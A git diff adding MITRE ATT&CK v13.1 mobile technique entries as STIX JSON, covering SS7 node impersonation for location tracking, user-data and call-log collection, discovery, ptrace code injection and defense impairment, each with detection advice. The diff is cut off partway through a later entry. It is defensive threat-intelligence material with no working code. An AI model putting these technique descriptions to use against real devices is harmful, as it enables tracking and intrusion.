a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7.json new file mode 100644 index 0000000000000000000000000000000000000000..41a3538688e1a1e2c29f29336dc082d87752a712 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7.json @@ -0,0 +1,84 @@ +{ + "type": "bundle", + "id": "bundle--bbaad56f-2fb0-4040-b993-388e783e3381", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:41:45.256Z", + "name": "Impersonate SS7 Nodes", + "description": "Adversaries may exploit the lack of authentication in signaling system network nodes to track the to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport) \n\n \n\nBy providing the victim\u2019s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device\u2019s geographical cell area or nearest cell tower.(Citation: Engel-SS7)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC-WG1-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "created": "2022-04-05T19:49:58.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1430/002", + "external_id": "T1430.002" + }, + { + "source_name": "3GPP-Security", + "description": "3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016.", + "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf" + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf" + }, + { + "source_name": "CSRIC-WG1-FinalReport", + "description": "CSRIC-WG1-FinalReport" + }, + { + "source_name": "Positive-SS7", + "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016.", + "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf" + }, + { + "source_name": "Engel-SS7-2008", + "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016.", + "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI" + }, + { + "source_name": "Engel-SS7", + "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016.", + "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html", + "external_id": "CEL-38" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799.json new file mode 100644 index 0000000000000000000000000000000000000000..7cf544ff0689dc4d8fd4de8c34b0484a1be751d1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799.json @@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--306785f9-17d3-46dc-a4e4-bdf5b8919e54", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799", + "type": "attack-pattern", + "created": "2017-10-25T14:48:30.462Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1425", + "external_id": "T1425" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "Insecure Third-Party Libraries", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e.json new file mode 100644 index 0000000000000000000000000000000000000000..a85ae1edd06fa8a6bcf44e9bf4686c20df85e645 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--f97cf624-ea91-4ce2-9c98-64119f34b550", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:56:20.270Z", + "name": "Protected User Data", + "description": "Adversaries may utilize standard operating system APIs to collect data from permission-backed data stores on a device, such as the calendar or contact list. These permissions need to be declared ahead of time. On Android, they must be included in the application\u2019s manifest. On iOS, they must be included in the application\u2019s `Info.plist` file. \n\n \n\nIn almost all cases, the user is required to grant access to the data store that the application is trying to access. In recent OS versions, vendors have introduced additional privacy controls for users, such as the ability to grant permission to an application only while the application is being actively used by the user. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access [Protected User Data](https://attack.mitre.org/techniques/T1636) without the user\u2019s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view permissions granted to an application in device settings. Application vetting services typically flag permissions requested by an application, which can be reviewed by an administrator. Certain dangerous permissions, such as `RECEIVE_SMS`, could receive additional scrutiny.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "created": "2022-04-01T12:36:41.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636", + "external_id": "T1636" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8.json new file mode 100644 index 0000000000000000000000000000000000000000..1ab9c2d8ae0c1cd466bf4b5d984e4ca96c13e6ec --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--f1fc12e5-588b-48ff-97f8-acf672089bc5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "created": "2022-04-05T20:15:43.636Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521.002", + "url": "https://attack.mitre.org/techniques/T1521/002" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private that should not be distributed. Due to how asymmetric algorithms work, the sender encrypts data with the receiver\u2019s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA, ElGamal, and ECDSA.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1521/002).", + "modified": "2022-04-05T20:16:21.324Z", + "name": "Asymmetric Cryptography", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2.json new file mode 100644 index 0000000000000000000000000000000000000000..3760ff55120b44ba2893cd5c0a5c5ab5b35059ca --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--dfe1199f-937e-44b1-b741-34dc24e55f39", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:55:03.477Z", + "name": "Software Discovery", + "description": "Adversaries may attempt to get a listing of applications that are installed on a device. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1418) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempts specific actions. \n\n \n\nAdversaries may attempt to enumerate applications for a variety of reasons, such as figuring out what security measures are present or to identify the presence of target applications. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "created": "2017-10-25T14:48:28.067Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1418", + "external_id": "T1418" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html", + "external_id": "APP-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19.json new file mode 100644 index 0000000000000000000000000000000000000000..f872c86bc357cadb45925c62d005584b05990b25 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--b373a8d1-e263-4132-aabe-b45e3f98049f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:55:23.702Z", + "name": "Process Discovery", + "description": "Adversaries may attempt to get information about running processes on a device. Information obtained could be used to gain an understanding of common software/applications running on devices within a network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1424) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. \n\n \n\nRecent Android security enhancements have made it more difficult to obtain a list of running processes. On Android 7 and later, there is no way for an application to obtain the process list without abusing elevated privileges. This is due to the Android kernel utilizing the `hidepid` mount feature. Prior to Android 7, applications could utilize the `ps` command or examine the `/proc` directory on the device.(Citation: Android-SELinuxChanges) \n\n \n\nIn iOS, applications have previously been able to use the `sysctl` command to obtain a list of running processes. This functionality has been removed in later iOS versions. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can typically detect rooted devices, which is an indication that Process Discovery is possible. Application vetting could potentially detect when applications attempt to abuse root access or root the system itself. Further, application vetting services could look for attempted usage of legacy process discovery mechanisms, such as the usage of `ps` or inspection of the `/proc` directory.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "created": "2017-10-25T14:48:33.926Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1424", + "external_id": "T1424" + }, + { + "source_name": "Android-SELinuxChanges", + "description": "Various. (2016, March 31). Overly restrictive SELinux filesystem permissions in Android N. Retrieved December 21, 2016.", + "url": "https://code.google.com/p/android/issues/detail?id=205565" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d.json new file mode 100644 index 0000000000000000000000000000000000000000..137478e7e82472d82acaf13c10b627e268291102 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--a072dafb-5f0b-4bc8-a380-761a231eb271", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:32:30.150Z", + "name": "Call Log", + "description": "Adversaries may utilize standard operating system APIs to gather call log data. On Android, this can be accomplished using the Call Log Content Provider. iOS provides no standard API to access the call log. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access the [Call Log](https://attack.mitre.org/techniques/T1636/002) without the user\u2019s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary. Application vetting services could look for `android.permission.READ_CALL_LOG` in an Android application\u2019s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "created": "2022-04-01T13:12:23.522Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/002", + "external_id": "T1636.002" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e.json new file mode 100644 index 0000000000000000000000000000000000000000..33f6a12bcd1753d8d2072123698c37574ee0f19e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--2c10842c-8b18-4447-9b16-9ca8105dd7c1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:55:33.642Z", + "name": "Security Software Discovery", + "description": "Adversaries may attempt to get a listing of security applications and configurations that are installed on a device. This may include things such as mobile security products. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1418/001) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "created": "2022-03-31T19:50:45.752Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1418/001", + "external_id": "T1418.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html", + "external_id": "APP-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1f96d624-8409-4472-ad8a-30618ee6b2e2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1f96d624-8409-4472-ad8a-30618ee6b2e2.json new file mode 100644 index 0000000000000000000000000000000000000000..367e07944d3b4f38f70c9c6b268bc9c421cf2e29 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1f96d624-8409-4472-ad8a-30618ee6b2e2.json @@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--a1530391-b8dc-44c7-9446-89ee308d8797", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--1f96d624-8409-4472-ad8a-30618ee6b2e2", + "type": "attack-pattern", + "created": "2017-10-25T14:48:10.699Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1434", + "external_id": "T1434" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "App Delivered via Email Attachment", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee.json new file mode 100644 index 0000000000000000000000000000000000000000..f1d7046201de192ab7f87c511ba455345fa459bc --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--a577afff-5bc8-48d9-a7b7-6960e78dc7cf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:57:40.571Z", + "name": "Ptrace System Calls", + "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (e.g., by using `malloc`) then invoking that memory with `PTRACE_SETREGS` to set the register containing the next instruction to execute. Ptrace system call injection can also be done with `PTRACE_POKETEXT`/`PTRACE_POKEDATA`, which copy data to a specific address in the target process's memory (e.g., the current address of the next instruction).(Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible when targeting processes with high-privileges, and on some systems those that are non-child processes.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for misuse of dynamic libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "created": "2022-03-30T19:05:17.048Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1631/001", + "external_id": "T1631.001" + }, + { + "source_name": "BH Linux Inject", + "description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.", + "url": "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf" + }, + { + "source_name": "Medium Ptrace JUL 2018", + "description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.", + "url": "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be" + }, + { + "source_name": "PTRACE man", + "description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.", + "url": "http://man7.org/linux/man-pages/man2/ptrace.2.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a.json new file mode 100644 index 0000000000000000000000000000000000000000..406a1895cccc50918f6242f83c02ee70ddf4c002 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--e3320dba-5a09-482a-9074-e04a99a89c79", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:59:55.849Z", + "name": "Impair Defenses", + "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may span both native defenses as well as supplemental capabilities installed by users or mobile endpoint administrators.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products integrated with Samsung Knox for Mobile Threat Defense can monitor processes to see if security tools are killed or stop running. Application vetting can detect many techniques associated with impairing device defenses.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "created": "2022-04-01T18:42:22.117Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629", + "external_id": "T1629" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2204c371-6100-4ae0-82f3-25c07c29772a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2204c371-6100-4ae0-82f3-25c07c29772a.json new file mode 100644 index 0000000000000000000000000000000000000000..34e9512e40f8a15c3ba7f49ba06b927fb316f7fd --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2204c371-6100-4ae0-82f3-25c07c29772a.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--41678525-7554-432b-9448-d83257461c68", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Luk\u00e1\u0161 \u0160tefanko, ESET" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--2204c371-6100-4ae0-82f3-25c07c29772a", + "type": "attack-pattern", + "created": "2017-10-25T14:48:08.613Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "external_id": "T1453", + "url": "https://attack.mitre.org/techniques/T1453" + }, + { + "url": "https://www.skycure.com/blog/accessibility-clickjacking/", + "description": "Yair Amit. (2016, March 3). \u201cAccessibility Clickjacking\u201d \u2013 The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016.", + "source_name": 